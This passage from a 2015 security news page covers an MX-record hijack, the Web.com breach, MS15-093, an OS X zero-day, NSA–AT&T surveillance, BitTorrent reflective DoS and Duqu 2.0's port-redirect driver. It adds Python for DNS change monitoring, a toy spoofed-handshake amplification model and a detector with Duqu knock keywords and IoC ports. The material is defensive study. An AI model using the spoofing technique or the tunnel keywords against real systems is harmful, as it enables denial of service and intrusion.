The problem here is that the trust for our most critical infrastructure now lies completely with the ISP (or hosting company). Why is that a problem? Well, remember all those attacks that happen when an account at a registrar gets hacked and the domain information (including the DNS servers) gets changed? The same thing applies here: DNS servers are the key to our kingdom.
I recently had to work on an incident that involved such an attack, where the NS records were modified silently by an attacker who got access to the hosting company. And that attack was very sneaky: the attacker modified only selected DNS records, the MX records. So, for a couple of hours during a business day, the attacker changed the MX records (only) to point to his SMTP servers. Those servers were configured just to relay e-mail to the real destination (and, additionally, a specific version of an SMTP server was used to prevent headers being added). This was a very simple Man-in-the-Middle attack that was, unfortunately, very successful for the attacker, as he was able to collect and analyze absolutely all e-mail sent to the victim company. While he was not able to see the outgoing e-mails, just remember how many times you’ve seen people actually remove the original e-mail (or reply inline) when replying? This is indeed very rare these days, although older readers will remember that once upon a time it was part of netiquette.
Lessons learned here? While outsourcing DNS servers is not necessarily a bad thing, be aware of the risks that come with it (and with cloud usage in general). For this particular case, depending on the business the target company is in, I most of the times recommend that the DNS servers, as critical infrastructure, are kept on premises and managed by local staff. This way, you decrease the risk of the hosting company getting pwned, or simply risk of a disgruntled employee at the hosting company.
If you do decide to outsource DNS anyway, ask yourself first if you would detect the attack I mentioned? What controls do you have in place for detecting such an attack?
Implementation of additional monitoring controls such as regularly checking your critical DNS records (such as NS, MX and possibly A records for critical names) can go a long way and is very inexpensive. For this particular case, SPF would help as well, but unfortunately the majority of servers will simply use SPF information for spam detection and only very rare MUA’s will warn users when SPF records do not match the sending IP address.
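One way to implement that check, as an added example rather than code from the diary, is to keep a known-good snapshot of the watched record sets and diff each fresh lookup against it. The parser below reads the format dig prints (the NS and A lines are the ones from the query above; the MX and TXT records and the attacker’s relay host are constructed for the example), and the comparison ignores TTLs, which count down between queries and would otherwise generate noise.

```python
"""Baseline-and-diff check for critical DNS records (added example).

parse_dig() understands the answer/additional section lines that dig prints;
diff_snapshots() reports every record set that changed. TTLs are ignored on
purpose: they count down between queries and are not what we are watching.
"""
from collections import defaultdict

WATCHED_TYPES = ("NS", "MX", "A", "TXT")


def parse_dig(text):
    """Turn dig output into {(owner, rrtype): frozenset(rdata)}.

    Comment lines (';'), blank lines and record types we do not watch are
    skipped. rdata is kept as the text after the type field, so an MX
    preference change is reported as well as a host change.
    """
    records = defaultdict(set)
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        fields = line.split(None, 4)        # owner ttl class type rdata
        if len(fields) != 5 or fields[2] != "IN":
            continue
        owner, _ttl, _cls, rrtype, rdata = fields
        if rrtype in WATCHED_TYPES:
            records[(owner.lower(), rrtype)].add(" ".join(rdata.split()))
    return {k: frozenset(v) for k, v in records.items()}


def diff_snapshots(baseline, current):
    """Return a sorted list of human-readable alerts; empty if nothing moved.

    A record set that disappears entirely is reported too: the attack in the
    text replaced the MX set wholesale, it did not add to it.
    """
    alerts = []
    for key in sorted(set(baseline) | set(current)):
        owner, rrtype = key
        before = baseline.get(key, frozenset())
        after = current.get(key, frozenset())
        for rdata in sorted(before - after):
            alerts.append(f"{owner} {rrtype} REMOVED {rdata}")
        for rdata in sorted(after - before):
            alerts.append(f"{owner} {rrtype} ADDED {rdata}")
    return alerts


# Constructed sample data. The NS/A lines mirror the dig output in the text;
# the MX and TXT records and the attacker host are invented for the example.
BASELINE_DIG = """
;; ANSWER SECTION:
target.com. 1365 IN NS zion.target.com.
target.com. 1365 IN NS morpheus.target.com.
target.com. 3600 IN MX 10 mail.target.com.
target.com. 3600 IN TXT "v=spf1 mx -all"
;; ADDITIONAL SECTION:
zion.target.com. 1366 IN A 212.71.248.24
morpheus.target.com. 9018 IN A 88.198.75.37
"""

# Same zone a few hours later: only the MX record has been swapped, and the
# TTLs have counted down (which must not raise an alert).
TAMPERED_DIG = """
;; ANSWER SECTION:
target.com. 1200 IN NS zion.target.com.
target.com. 1200 IN NS morpheus.target.com.
target.com. 300 IN MX 10 relay.attacker.example.
target.com. 3600 IN TXT "v=spf1 mx -all"
;; ADDITIONAL SECTION:
zion.target.com. 1100 IN A 212.71.248.24
morpheus.target.com. 9000 IN A 88.198.75.37
"""


def check_zone(baseline_text, current_text):
    """Run the whole check against two dig outputs and return the alerts."""
    return diff_snapshots(parse_dig(baseline_text), parse_dig(current_text))


if __name__ == "__main__":
    for alert in check_zone(BASELINE_DIG, TAMPERED_DIG):
        print("ALERT:", alert)
```

In production, current_text would be the concatenated output of one scheduled `dig +noall +answer +additional target.com <TYPE>` query per watched type, ideally run from outside the company network so the check sees what the Internet sees, and the baseline would only change through a reviewed process. Against the incident described above this fires within one polling interval of the MX swap, which is the window the attacker was counting on nobody watching.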
Have similar outsourcing war stories? Let us know!
Payment card info of 93,000 Web.com customers stolen
19.8.2015
The name, address, and credit card information of approximately 93,000 customers of Web.com, a popular US-based provider of Internet services to small businesses, have been compromised due to a breach of one of the company's computer systems.
Social security numbers and card validation codes were not compromised, and only the credit card information on file to pay for Web.com services has been affected.
According to the FAQ document published on Tuesday, the attack was detected on August 13, 2015. The company doesn't say how long the unknown perpetrators had access to the system, but says that the unauthorized activity was uncovered "quickly."
"The company discovered the unauthorized activity as part of its ongoing security monitoring, quickly shut down the access, and immediately began working with a nationally recognized IT security firm to conduct a thorough investigation. We have reported the attack to credit card processors and the proper federal and state authorities," they noted, and added that despite having very strong and sophisticated security measures in place to protect their computer systems, and regularly reviewing and updating their security protocols, no business is immune to cybercrime.
The company has sent out email and regular mail notifications to affected customers, and says that those who do not receive either by August 30, 2015, can breathe a sigh of relief. All in all, the company has around 3.3 million customers.
All affected customers will receive one year of free credit monitoring, but they will probably have to get new payment cards. In the meantime, they are advised to keep a close eye out for any suspicious or unusual activity on the credit/debit cards they used with Web.com.
Core Infrastructure Initiative Launches Open Source Security Badge Program
19.8.2015
The Core Infrastructure Initiative (CII), a consortium of technology companies guided by The Linux Foundation, has thrown good money at solving the security woes of open source software. Since its inception last year, it has provided funding for the OpenSSL project, allowing it to hire full-time help and audit and clean up its codebase. It has also helped support the Open Crypto Audit Project (OCAP), which was behind the TrueCrypt audit, as well as GnuPG, Frama-C, and the Fuzzing Project.
In addition to funding specific projects, CII sponsors initiatives that preempt security trouble. Its latest venture, announced today, is a free badge program that helps enterprise developers evaluate whether open source projects follow secure development practices. For now, CII is looking for industry feedback on what criteria should be used to establish the program’s eventual gold, silver and bronze tiers. A first draft of the criteria, written by open source and security researcher David A. Wheeler of the Institute for Defense Analyses and Dan Kohn, a CII senior advisor, is available on GitHub.
Some of the criteria, such as whether the project has a public website with basic content, an OSS license, a public version-controlled source repository, a bug reporting process, unique version numbering, a change log and more, will ultimately be automatically testable, said CII senior director of infrastructure Emily Ratliff. For criteria that are not automatically testable, such as whether multiple developers review commits, the CII will develop a survey-based system.
“When you’re creating a project, whether it’s open- or closed-source, very few projects are 100 percent your own code. You have to decide which projects you can rely upon,” Ratliff said. “Open source projects often don’t have risk evaluations, and it’s tricky to do yourself. We’re introducing this best practices badge program to make it easy to find all that information in one place and make it easy to see which project is self-certifying its security best practices around development.”
Ratliff hopes that developers, especially those already developing under some kind of software assurance model, contribute not only feedback on the existing criteria but additional best practices. While there is no cost for the badge program, projects will have to enroll and be tested and/or complete the survey, Ratliff said.
“We want feedback on the criteria: Is it too easy, too hard,” Ratliff said. “This is ongoing, an open call for anyone. When we feel like we have had sufficient discussion with the key projects and with enough developers, we’ll move on to the next phase [completing the automated testing code and awarding badges].”
The CII also announced that it had added two new advisory board members, Adam Shostack and Tom Ritter. Shostack is best known for his time at Microsoft, where he designed the freely available threat modeling tool used by its Security Development Lifecycle. He is also the coauthor of The New School of Information Security. Ritter is practice director of Cryptography Services at NCC Group, one of the auditors involved in the TrueCrypt audit.
Microsoft Security Bulletin MS15-093 - Critical OOB - Internet Explorer RCE
19.8.2015
Security Update for Internet Explorer (3088903)
Recommendation: Test and patch ASAP
Mitigation option: EMET 5.2 configured to protect Internet Explorer (the default configuration) is able to block the known exploit
Related Bulletin and KBs:
https://technet.microsoft.com/library/security/MS15-093
https://support.microsoft.com/en-us/kb/3087985
https://support.microsoft.com/en-us/kb/3081444
https://support.microsoft.com/en-us/kb/3088903
Executive Summary
"This security update resolves a vulnerability in Internet Explorer. The vulnerability could allow remote code execution if a user views a specially crafted webpage using Internet Explorer. An attacker who successfully exploited this vulnerability could gain the same user rights as the current user. Customers whose accounts are configured to have fewer user rights on the system could be less impacted than those who operate with administrative user rights.
This security update is rated Critical for Internet Explorer 7 (IE 7), Internet Explorer 8 (IE 8), Internet Explorer 9 (IE 9), Internet Explorer 10 (IE 10), and Internet Explorer 11 (IE 11) on affected Windows clients, and Moderate for Internet Explorer 7 (IE 7), Internet Explorer 8 (IE 8), Internet Explorer 9 (IE 9), Internet Explorer 10 (IE 10), and Internet Explorer 11 (IE 11) on affected Windows servers. For more information, see the Affected Software section.
The security update addresses the vulnerability by modifying how Internet Explorer handles objects in memory.
For more information about this update, see Microsoft Knowledge Base Article 3088903."
Vulnerability Information
"An attacker could host a specially crafted website that is designed to exploit this vulnerability through Internet Explorer, and then convince a user to view the website. The attacker could also take advantage of compromised websites and websites that accept or host user-provided content or advertisements by adding specially crafted content that could exploit this vulnerability. In all cases, however, an attacker would have no way to force users to view the attacker-controlled content. Instead, an attacker would have to convince users to take action, typically by getting them to click a link in an instant messenger or email message that takes users to the attacker's website, or by getting them to open an attachment sent through email.
An attacker who successfully exploited this vulnerability could gain the same user rights as the current user. If the current user is logged on with administrative user rights, an attacker who successfully exploited this vulnerability could take complete control of an affected system. An attacker could then install programs; view, change, or delete data; or create new accounts with full user rights. Systems where Internet Explorer is used frequently, such as workstations or terminal servers, are at the most risk from this vulnerability."
Researcher releases exploit for OS X 0-day that gives root access
18.8.2015
Italian security researcher Luca Todesco has published PoC exploit code for a newly discovered zero-day privilege escalation flaw affecting OS X Yosemite (v10.10) and Mavericks (v10.9).
Symantec experts have analysed the exploit and say it works as described.
"The exploit uses two different vulnerabilities to create a memory corruption in the OS X kernel. This is then used to bypass security features that block exploit code from running, providing the attacker with root access," they explained.
"While the vulnerabilities require the victim to voluntarily run an application in order for an attack to be successful, they represent a threat until a patch is published by Apple."
According to Todesco, one of the vulnerabilities has been patched in OS X El Capitan (v10.11, still in beta), so the exploit won't work on a machine running it.
He notified Apple of the existence of these flaws a few hours before releasing the exploit, but didn't explain why he released it without giving Apple a chance to plug the hole first. He simply says he "had reasons."
According to Engadget, Todesco and Apple are in contact, and Apple is hopefully working on a fix that will be pushed out soon, as we can be sure that malicious actors are doing their best to find a way to use the exploit.
In the meantime, users can protect themselves against it by downloading and running only applications they trust, by updating to OS X El Capitan, or by installing SUIDGuard, Stefan Esser's kernel extension that, among other things, stops NULL page exploits like Todesco's.
AT&T Facilitated NSA Surveillance Efforts, Reports
17.8.2015
Telecommunication giant AT&T facilitated, to a larger degree than any other provider, the National Security Agency’s surveillance reach beyond domestic telephone data collection to email and Internet traffic, companion New York Times and ProPublica articles said on Saturday. It is probably the worst-kept secret among the revelations from the NSA documents provided by former contractor Edward Snowden. Suspicion that AT&T was enabling NSA surveillance dates back beyond a 2006 class-action lawsuit filed by the Electronic Frontier Foundation alleging AT&T’s collaboration with the NSA in illegal programs to wiretap and collect data from Americans’ communications, and the revelation of the existence of Room 641A at AT&T’s (then SBC Communications) Folsom Street location in San Francisco.
The documents published this weekend demonstrate the coziness of the two sides’ partnership; the documents even stress that NSA agents display a cordial, friendly nature, given that the agency’s relationship with AT&T was not contractual. The NSA, according to the documents, has surveillance equipment installed in at least 17 AT&T Internet hubs in the U.S., far more than in Verizon hubs, and its budget for operations involving AT&T is double the budget for other providers. The Times and ProPublica said that AT&T had given the intelligence agency access to billions of emails moving across domestic networks, and also exposed a secret court order that permitted the wiretapping of Internet communications at United Nations headquarters in New York, an AT&T customer.
“These documents not only further confirm our claims in Jewel, but convincingly demolish the government’s core response—that EFF cannot prove that AT&T’s facilities were used in the mass surveillance,” said EFF Executive Director Cindy Cohn. Jewel refers to the EFF’s Jewel v. NSA suit on behalf of AT&T customers. “It’s long past time that the NSA and AT&T came clean with the American people,” Cohn said. “It’s also time that the public U.S. courts decide whether these modern general searches are consistent with the Fourth Amendment’s guarantee against unreasonable search and seizure.”
The documents provide a blueprint of the NSA’s relationships with AT&T and Verizon (MCI), called Fairview and Stormbrew respectively. Fairview, the Times said, dates back 30 years and is the evidence confirming AT&T as the NSA’s principal partner; AT&T is never mentioned by name in the documents. Investigators at both publications connected a number of dots linking AT&T to the NSA: repairs to a Fairview fiber-optic cable damaged by the 2011 Japan earthquake were logged on the same day as repairs to a cable operated in Japan by AT&T, and technical terms specific to AT&T were found in the Fairview documents. Also linked to Fairview was evidence of the court order permitting surveillance at the U.N., which was serviced by AT&T.
The NSA papers also spell out a timeline of post-September 11 data mining and sharing, pointing out that AT&T began sharing email and phone call metadata days after the attacks while MCI did not until the following February. Two years later, the documents indicate, AT&T was the NSA’s first partner to provide the agency with a “live presence” on the Internet and within months had forwarded 400 billion Internet metadata records, not content, to a keyword selection system operated by the agency. As of late 2003, the Stormbrew program, which cost half the $189 million of Fairview, had yet to turn on these capabilities, the Times reported.
Matthew Green, a Johns Hopkins professor and cryptographer, wrote an essay this morning on his personal website aimed at security engineers. In it he said that while some progress has been made in encrypting data, the security industry still tolerates the existence of unencrypted protocols and services, pointing specifically to ISPs’ practice of downgrading email encryption by stripping the STARTTLS advertisement out of SMTP sessions. “Even if we, by some miracle, manage to achieve 100% encryption of communications content, we still haven’t solved the whole problem,” Green wrote. “Unfortunately, today’s protocols still leak a vast amount of useful information via session metadata. And we have no good strategy on the table to defend against it.”
Insecure protocols still share in-the-clear data such as protocol type, port number and routing information, Green said, along with traffic characteristics and other related data. “Absolutely none of this is news to security engineers. The problem is that there’s so little we can do about it,” Green said. “Anonymity networks like Tor protect the identity of endpoints in a connection, but they do so at a huge cost in additional bandwidth and latency — and they offer only limited protection in the face of a motivated global adversary. IPSec tunnels only kick the can to a different set of trusted components that themselves can be subverted.”
One of the recurring themes at the recent Black Hat conference was the eroding trust in the Internet and the need for security and privacy activists to speak up and also build reliable and secure protocols and systems that are simple to use. Influencers such as keynote speaker Jennifer Granick, a longtime defender of hackers, point out that as more emerging, and sometimes sanctioned, nations come online, Internet traffic may be increasingly routed through countries that lack freedom of speech or Bill of Rights-style protections.
“If you believe that this is the future, then the answer certainly won’t involve legislation or politics. The NSA won’t protect us through cyber-retaliation or whatever plan is on the table today. If you’re concerned about the future, then the answer is to finally, truly believe our propaganda about network trust,” Green said. “We need to learn to build systems today that can survive such an environment. Failing that, we need to adjust to a very different world.”
Using BitTorrent Vulnerabilities to Launch Distributed Reflective DoS Attacks
17.8.2015
Researchers warn that several protocols used by the peer-to-peer file sharing service BitTorrent, as well as a handful of clients that implement them, can be leveraged to carry out distributed reflective denial of service (DRDoS) attacks. In a DRDoS attack the attacker sends comparatively small, spoofed requests to amplifiers, which act as reflectors and send a much larger volume of response traffic to the victim. Unlike conventional DoS attacks, in DRDoS attacks traffic isn’t sent directly to the victim.
Researchers describe several attack scenarios involving the protocol in an academic paper, “P2P File-Sharing in Hell: Exploiting BitTorrent Vulnerabilities to Launch Distributed Reflective DoS Attacks” (PDF), published as part of USENIX’s WOOT ’15 workshop last week. In the paper, Florian Adamsky, a research student at City University London, describes how to exploit common BitTorrent network protocols, including its default transport option, uTP. Adamsky, who has published BitTorrent research in the past, was assisted by PLUMgrid, Inc.’s Syed Ali Khayam, THM Friedberg’s Rudolf Jäger, and City University London’s Muttukrishnan Rajarajan.
To test the attacks the researchers put together a “P2P lab testbed” composed of more than 10,000 BitTorrent handshakes, the two-way connection setups between uTP nodes. Provided they know a valid SHA-1 info-hash, the researchers claim, attackers can abuse uTP by initiating connections from a spoofed IP address. Attacks channeled through BitTorrent could be amplified up to 50 times. This includes those reflected off some of the protocol’s more popular clients, such as uTorrent, Mainline and one of the biggest culprits, Vuze, which they found amplified attacks up to 54 times.
“uTP establishes a connection with a two-way handshake. This allows an attacker to establish a connection with an amplifier using a spoofed IP address, as the receiver does not check whether the initiator has received the acknowledgment,” the paper reads.
The vector the attack uses is difficult to detect, the researchers warn, stressing that a DRDoS attack routed through BitTorrent can’t be detected by normal firewalls. Defenders would have to go further, by implementing a Deep Packet Inspection (DPI) firewall, to detect most of the attacks, according to Adamsky and company. An MSE handshake would be even trickier. “In case of a MSE handshake, it is even harder to detect the attack, since the packet contains a high entropy payload with a public key and random data,” the researchers write.
To prevent the attacks, the researchers encourage the developers behind the protocol to switch uTP to a three-way handshake like the one TCP uses, in which the initiator must echo back a value it can only have learned from the responder’s reply; an initiator that spoofed its source address never sees that reply. The researchers claim a handful of other techniques, such as limiting the messages in the first uTP packet sent to amplifiers, could also help thwart IP spoofing and minimize the number of amplification attacks that use BitTorrent as a medium.
The researchers stress that protocols used by BitTorrent other than uTP, including DHT (Distributed Hash Table), MSE (Message Stream Encryption) and BTSync (BitTorrent Sync), are also vulnerable to these types of attacks. In the case of BTSync, an attacker could use “a single ping message” to amplify some attacks up to 120 times, according to the paper.
New forms of reflected distributed denial of service attacks are upping the ante when it comes to large-scale DDoS attacks. Earlier this year hackers used an old routing protocol, RIPv1, found on multiple old and out-of-date business routers, to launch both reflection and amplification DDoS attacks. In April experts warned of a vulnerability in Multicast DNS that could be harnessed to trigger high-volume DDoS amplification attacks.
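The structural reason the two-way handshake reflects, and the three-way one does not, can be shown with a toy model (an added example, not the researchers’ testbed code and not real uTP wire format). Both responders below reply to whatever source address a SYN claims; the difference is that the uTP-style one accepts data on the predictable connection id immediately, while the TCP-style one accepts data only after the initiator echoes a random value that was delivered to the victim, never to the attacker. Message sizes, the 2000-piece bitfield and the addresses are constructed for the example; the 50x and 54x factors reported in the paper come from real clients sending far more in response than this model does.

```python
"""Why a two-way handshake reflects and a three-way one does not (added example).

Packets are plain Python objects; only the header length (20 bytes, BEP 29
without extensions) and payload sizes feed the amplification arithmetic.
All sizes and addresses are constructed, not measurements from the paper.
"""
from dataclasses import dataclass
import secrets

UTP_HEADER_LEN = 20
ST_DATA, ST_STATE, ST_SYN = 0, 2, 4
VICTIM_IP = "198.51.100.7"          # documentation range, constructed

# BitTorrent-layer messages: the 68-byte handshake, and what a seeding peer
# might answer with (handshake + bitfield for a constructed 2000-piece torrent).
BT_HANDSHAKE = b"\x13BitTorrent protocol" + bytes(8) + bytes(20) + bytes(20)
BITFIELD_MSG = (1 + 250).to_bytes(4, "big") + b"\x05" + bytes(250)
BT_REPLY = BT_HANDSHAKE + BITFIELD_MSG


@dataclass
class Packet:
    dst: str            # where the network will deliver it
    src: str            # claimed source; the attacker forges this
    ptype: int
    conn_id: int
    seq_nr: int = 0
    ack_nr: int = 0
    payload: bytes = b""

    def size(self):
        return UTP_HEADER_LEN + len(self.payload)


class TwoWayResponder:
    """uTP-style peer: after a SYN on id C it accepts data on id C+1 at once.
    Nothing proves the initiator ever received our ST_STATE."""

    def __init__(self):
        self.established = set()

    def handle(self, pkt):
        if pkt.ptype == ST_SYN:
            self.established.add((pkt.src, pkt.conn_id + 1))
            return [Packet(pkt.src, "amplifier", ST_STATE, pkt.conn_id, seq_nr=1, ack_nr=pkt.seq_nr)]
        if pkt.ptype == ST_DATA and (pkt.src, pkt.conn_id) in self.established:
            return [Packet(pkt.src, "amplifier", ST_DATA, pkt.conn_id - 1, seq_nr=2,
                           ack_nr=pkt.seq_nr, payload=BT_REPLY)]
        return []


class ThreeWayResponder:
    """TCP-style peer: our reply carries a random number, and data is only
    accepted once the initiator echoes that number back in ack_nr."""

    def __init__(self):
        self.pending = {}

    def handle(self, pkt):
        if pkt.ptype == ST_SYN:
            isn = secrets.randbelow(2**32 - 1) + 1          # never 0, so a blind guess of 0 always fails
            self.pending[(pkt.src, pkt.conn_id + 1)] = isn
            return [Packet(pkt.src, "amplifier", ST_STATE, pkt.conn_id, seq_nr=isn, ack_nr=pkt.seq_nr)]
        if pkt.ptype == ST_DATA and self.pending.get((pkt.src, pkt.conn_id)) == pkt.ack_nr:
            return [Packet(pkt.src, "amplifier", ST_DATA, pkt.conn_id - 1, payload=BT_REPLY)]
        return []


def reflect(responder, conn_id=0x1234):
    """Blind attacker: a SYN and then a BitTorrent handshake, both with the
    victim's address as source. The attacker receives nothing, so ack_nr is a
    guess. Returns (bytes the attacker sent, bytes the victim received, ratio)."""
    sent = [
        Packet("amplifier", VICTIM_IP, ST_SYN, conn_id, seq_nr=1),
        Packet("amplifier", VICTIM_IP, ST_DATA, conn_id + 1, seq_nr=2, ack_nr=0, payload=BT_HANDSHAKE),
    ]
    to_victim = sum(reply.size() for pkt in sent for reply in responder.handle(pkt) if reply.dst == VICTIM_IP)
    attacker_bytes = sum(p.size() for p in sent)
    return attacker_bytes, to_victim, to_victim / attacker_bytes


if __name__ == "__main__":
    for name, resp in (("two-way (uTP)", TwoWayResponder()), ("three-way", ThreeWayResponder())):
        sent, got, factor = reflect(resp)
        print(f"{name}: attacker sent {sent} B, victim received {got} B, amplification {factor:.2f}x")
```

With the constructed sizes the two-way responder delivers 363 bytes to the victim for 108 bytes of attacker traffic, while the three-way responder delivers only its 20-byte reply and then drops the data, because the attacker cannot know the random value it would have to echo. The proposed mitigation of limiting what the first uTP packet may carry works on the same principle: the less a responder will send before the initiator has proven it can receive, the less there is to reflect.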
The Duqu 2.0 persistence module
16.8.2015
We have previously described how Duqu 2.0 doesn’t have a normal “persistence” mechanism. This can lead users to conclude that flushing out the malware is as simple as rebooting all the infected machines. In reality, things are a bit more complicated.
The attackers created an unusual persistence module which they deploy on compromised networks. It serves a double function – it also supports a hidden C&C communication scheme. This organization-level persistence is achieved by a driver that is installed as a normal system service. On 64-bit systems, this implies a strict requirement for an Authenticode digital signature. We have seen two such persistence drivers deployed in the course of attacks.
During their operations the Duqu threat actors install these malicious drivers on firewalls, gateways or any other servers that have direct Internet access on one side and corporate network access on the other. By using them, they can achieve several goals at once: access internal infrastructure from the Internet, avoid log records in corporate proxy servers and maintain a form of persistence after all.
In essence, the drivers redirect network streams to and from the gateway machine that runs them. To get connections forwarded, the attacker first has to pass a network-based “knocking” mechanism by presenting a secret keyword. We have seen two different secret keyword families in the samples we collected so far: “romanian.antihacker” and “ugly.gorilla”.
We described one of these drivers in our whitepaper about Duqu 2.0 (see the “portserv.sys driver analysis” section). Let us repeat some of the most important details. The driver listens on the network and expects a special secret keyword (“romanian.antihacker” in that case). After that, it saves the IP address of the host that presented the correct keyword and starts redirecting all packets from that host arriving on port 443 to port 445 (SMB) or 3389 (Remote Desktop) of the server. This effectively allows the attackers to tunnel SMB (i.e. remote file system access) and Remote Desktop through the gateway server while making it look like HTTPS traffic (port 443).
In addition to the “romanian.antihacker” driver, we have discovered another one which does a similar job but supports more redirections in a more generic way:
If the driver recognizes the secret keyword “ugly.gorilla1” then all traffic from the attacker’s IP will be redirected from port 443 (HTTPS) to 445 (SMB)
If the driver recognizes the secret keyword “ugly.gorilla2” then all traffic from the attacker’s IP will be redirected from port 443 (HTTPS) to 3389 (RDP)
If the driver recognizes the secret keyword “ugly.gorilla3” then all traffic from the attacker’s IP will be redirected from port 443 (HTTPS) to 135 (RPC)
If the driver recognizes the secret keyword “ugly.gorilla4” then all traffic from the attacker’s IP will be redirected from port 443 (HTTPS) to 139 (NETBIOS)
If the driver recognizes the secret keyword “ugly.gorilla5” then all traffic from the attacker’s IP will be redirected from port 1723 (PPTP) to 445 (SMB)
If the driver recognizes the secret keyword “ugly.gorilla6” then all traffic from the attacker’s IP will be redirected from port 443 (HTTPS) to 47012 (currently unknown).
We would like to note that one port here looks quite suspicious: 47012. So far, we haven’t seen any other Duqu 2.0 components using this port, nor have we found any other common malware, backdoor or legitimate software using this port (also according to SANS). However, considering that this port number was hardcoded into the malware this may be a good indicator of compromise for Duqu 2.0.
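As an added example (not Kaspersky’s code, and not part of the original write-up), the following Python check shows what a network sensor in front of such a gateway could look for: first payload bytes on tcp/443 or tcp/1723 that belong to SMB, RDP, DCE/RPC or NetBIOS rather than to TLS or PPTP, the hardcoded knock keywords listed above, and any connection to tcp/47012. How the knock keyword itself travels is not described in the text, so the sample flow that carries it inside an HTTP request, like all the other sample flows and addresses, is constructed for the example.

```python
"""Spotting the Duqu 2.0 port-redirect tunnel on the wire (added example).

Genuine HTTPS begins with a TLS record header and genuine PPTP with its
magic cookie, so a sensor can flag the first bytes of any flow that do not
match the protocol the port implies. The knock keywords and tcp/47012 from
the write-up are used as extra indicators. All sample flows are constructed.
"""

KNOCK_KEYWORDS = [b"romanian.antihacker"] + [b"ugly.gorilla%d" % i for i in range(1, 7)]
SUSPICIOUS_PORTS = {47012}
PPTP_MAGIC = b"\x1a\x2b\x3c\x4d"        # RFC 2637 magic cookie, bytes 4..8 of a control message


def classify(payload):
    """Identify the application protocol from the first bytes a client sends."""
    if len(payload) >= 3 and payload[0] == 0x16 and payload[1] == 0x03 and payload[2] <= 0x04:
        return "tls"                                        # TLS handshake record
    if len(payload) >= 8 and payload[0] == 0x00 and payload[4:8] in (b"\xffSMB", b"\xfeSMB"):
        return "smb"                                        # direct-TCP SMB1/SMB2 header
    if len(payload) >= 6 and payload[:2] == b"\x03\x00" and payload[5] == 0xE0:
        return "rdp"                                        # TPKT + X.224 Connection Request
    if len(payload) >= 3 and payload[:2] == b"\x05\x00" and payload[2] == 0x0B:
        return "dcerpc"                                     # DCE/RPC v5 bind
    if len(payload) >= 1 and payload[0] == 0x81:
        return "netbios"                                    # NetBIOS session request
    if len(payload) >= 8 and payload[4:8] == PPTP_MAGIC:
        return "pptp"
    return "unknown"


EXPECTED = {443: "tls", 1723: "pptp", 445: "smb", 3389: "rdp", 135: "dcerpc", 139: "netbios"}


def inspect_flow(src, dst, dport, payload):
    """Return the reasons this flow deserves a look (empty list = clean)."""
    reasons = []
    proto = classify(payload)
    expected = EXPECTED.get(dport)
    if expected and proto not in (expected, "unknown"):
        reasons.append(f"{proto} traffic on tcp/{dport} (expected {expected})")
    if dport in SUSPICIOUS_PORTS:
        reasons.append(f"connection to IoC port tcp/{dport}")
    for kw in KNOCK_KEYWORDS:
        if kw in payload:
            reasons.append(f"knock keyword {kw.decode()!r}")
    return reasons


def scan(flows):
    """flows: iterable of (src, dst, dport, first_payload_bytes) tuples."""
    return [(src, dst, dport, reason)
            for src, dst, dport, payload in flows
            for reason in inspect_flow(src, dst, dport, payload)]


# Constructed sample: a legitimate TLS client hello to the gateway, a
# legitimate SMB session to an internal file server, then the tunnel pattern.
GATEWAY = "192.0.2.10"
SAMPLE_FLOWS = [
    ("198.51.100.5", GATEWAY, 443, b"\x16\x03\x01\x00\xc8\x01\x00\x00\xc4\x03\x03"),
    ("192.0.2.50", "192.0.2.20", 445, b"\x00\x00\x00\xa4\xfeSMB@\x00"),
    ("203.0.113.66", GATEWAY, 443, b"GET /x?k=ugly.gorilla2 HTTP/1.1\r\n"),   # knock (transport assumed)
    ("203.0.113.66", GATEWAY, 443, b"\x03\x00\x00\x2b\x26\xe0\x00\x00\x00\x00"),  # RDP on 443
    ("203.0.113.66", GATEWAY, 443, b"\x00\x00\x00\xa4\xfeSMB@\x00"),             # SMB2 on 443
    ("203.0.113.66", GATEWAY, 1723, b"\x00\x00\x00\x40\xfeSMB@\x00"),            # SMB2 on 1723
    ("203.0.113.66", GATEWAY, 47012, b"\x00\x00\x00\x10junk"),                   # IoC port
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_FLOWS):
        print("ALERT", *hit)
```

An inbound connection on 443 that opens with an SMB2 NEGOTIATE or an X.224 Connection Request is hard to explain away as a false positive. The keywords and the port number are weaker indicators: the attackers can change a hardcoded string far more easily than the protocols they need to tunnel, which is why the protocol-mismatch check carries most of the weight here.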
Figure: Part of the malware with the array of secret keywords
This 64-bit driver contains an internal DLL name, “termport.sys”, while the filename in the filesystem was “portserv.sys”. This most likely means that the attackers change filenames for different operations and detection of this attack should not solely rely on names of the files. The compilation timestamp is apparently fake here: “Jul 23 18:14:28 2004”. All the discovered driver files were located in “C:\Windows\System32\drivers\”.
Perhaps the most important part of this attack strategy is the digital signature used for the 64-bit driver. Because this is a mandatory requirement on 64-bit Windows systems, the driver had a valid digital signature. It was signed by “HON HAI PRECISION INDUSTRY CO. LTD.” (also known as “Foxconn Technology Group”, one of the world’s largest electronics manufacturers).
Figure: Digital signature of the attackers’ driver
According to the information in the driver it was signed at 20:31 on 19.02.2015. Below are some more details provided by the Sysinternals sigcheck utility:
Verified: Signed
Signing date: 20:31 19.02.2015
Publisher: HON HAI PRECISION INDUSTRY CO. LTD.
Description: Port Optimizer for Terminal Server
Product: Microsoft Windows Operating System
Prod version: 6.1.7601
File version: 6.1.7601 built by: WinDDK
MachineType: 64-bit
MD5: 92E724291056A5E30ECA038EE637A23F
SHA1: 478C076749BEF74EAF9BED4AF917AEE228620B23
PESHA1: F8457AFBD6967FFAE71A72AA44BC3C3A134103D8
PE256: 2891059613156734067A1EF52C01731A1BCFB9C50E817F3CA813C19114BFA556
SHA256: BC4AE56434B45818F57724F4CD19354A13E5964FD097D1933A30E2E31C9BDFA5
According to Wikipedia, “Foxconn Technology Group” is the world’s largest electronics contract manufacturer and is headquartered in Tucheng, New Taipei, Taiwan.
Major customers of Foxconn include or have included some of the world’s largest enterprises:
Acer Inc.
Amazon.com
Apple Inc.
BlackBerry Ltd.
Cisco
Dell
Google
Hewlett-Packard
Huawei
Microsoft
Motorola Mobility
Nintendo
Nokia
Sony
Toshiba
Xiaomi
Vizio
Foxconn manufactures several popular products including BlackBerry, iPad, iPhone, Kindle, PlayStation 4, Xbox One and Wii U.
The same certificate was used by the manufacturer to sign several WatchDog Timer Kernel drivers (WDTKernel.sys) for Dell laptops in February 2013.
Conclusions
